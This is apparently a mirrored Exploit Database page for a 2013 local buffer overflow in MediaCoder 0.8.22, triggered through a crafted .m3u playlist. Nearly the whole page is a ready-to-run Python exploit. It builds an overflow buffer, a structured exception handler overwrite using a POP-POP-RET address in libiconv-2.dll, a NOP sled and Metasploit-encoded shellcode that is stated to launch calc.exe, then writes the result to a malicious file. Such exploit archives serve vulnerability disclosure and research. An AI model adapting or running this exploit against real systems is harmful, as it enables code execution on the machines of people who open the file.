Mediacoder – ‘.m3u’ Local Buffer Overflow (SEH)

• Exploit Database
• 14 阅读

• 作者： metacom
  日期： 2013-06-24
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/26403/

• #!/usr/bin/python
  import os
  import sys
  from struct import pack
  from time import sleep
  
  if os.name == "nt":
  os.system("cls")
  os.system("color 3f")
  
  else:
  os.system("clear")
  
  
  print """
   [+]Exploit Title: All Mediacoder Product SEH Buffer Overflow
   [+]Download All Product: http://www.mediacoderhq.com/editions.html
   [+]Vulnerable Product:!
   [+]Mediacoder 0.8.22.5525
   [+]Mediacoder Web Video Edition 0.8.22
   [+]Mediacoder Handsets Edition 0.8.22
   [+]Mediacoder iPhone Edition 0.8.22
   [+]MediaCoder-PSP Edition 0.8.22
   [+]Vulnerabilities File Format:m3u
   [+]Date (found): 21.06.2013
   [+]Date (publish): 21.06.2013
   [+]Founder: metacom
   [+]RST 
   [+]Tested on: Windows Xp pro-sp3 English
   """
  
  buffer = "http://" + "\x41" * 845
  nseh = "\xEB\x06\xFF\xFF"
  seh= pack('<I',0x66012E63)# 66012E63 POP EBX libiconv-2.dll
  nops= "\x90" * 80
  #msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x5c' -t c
  shell= ("\xbf\x8e\xa0\x35\xac\xda\xda\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
  "\x33\x83\xc3\x04\x31\x7b\x0e\x03\xf5\xae\xd7\x59\xf5\x47\x9e"
  "\xa2\x05\x98\xc1\x2b\xe0\xa9\xd3\x48\x61\x9b\xe3\x1b\x27\x10"
  "\x8f\x4e\xd3\xa3\xfd\x46\xd4\x04\x4b\xb1\xdb\x95\x7d\x7d\xb7"
  "\x56\x1f\x01\xc5\x8a\xff\x38\x06\xdf\xfe\x7d\x7a\x10\x52\xd5"
  "\xf1\x83\x43\x52\x47\x18\x65\xb4\xcc\x20\x1d\xb1\x12\xd4\x97"
  "\xb8\x42\x45\xa3\xf3\x7a\xed\xeb\x23\x7b\x22\xe8\x18\x32\x4f"
  "\xdb\xeb\xc5\x99\x15\x13\xf4\xe5\xfa\x2a\x39\xe8\x03\x6a\xfd"
  "\x13\x76\x80\xfe\xae\x81\x53\x7d\x75\x07\x46\x25\xfe\xbf\xa2"
  "\xd4\xd3\x26\x20\xda\x98\x2d\x6e\xfe\x1f\xe1\x04\xfa\x94\x04"
  "\xcb\x8b\xef\x22\xcf\xd0\xb4\x4b\x56\xbc\x1b\x73\x88\x18\xc3"
  "\xd1\xc2\x8a\x10\x63\x89\xc0\xe7\xe1\xb7\xad\xe8\xf9\xb7\x9d"
  "\x80\xc8\x3c\x72\xd6\xd4\x96\x37\x28\x9f\xbb\x11\xa1\x46\x2e"
  "\x20\xac\x78\x84\x66\xc9\xfa\x2d\x16\x2e\xe2\x47\x13\x6a\xa4"
  "\xb4\x69\xe3\x41\xbb\xde\x04\x40\xd8\x81\x96\x08\x31\x24\x1f"
  "\xaa\x4d")
  exploit = buffer + nseh + seh + nops + shell
   
  try:
  rst= open("All-MediaCoder.m3u",'w')
  rst.write(exploit)
  rst.close()
  raw_input("\nExploit file created!\n")
  except:
  print "Error"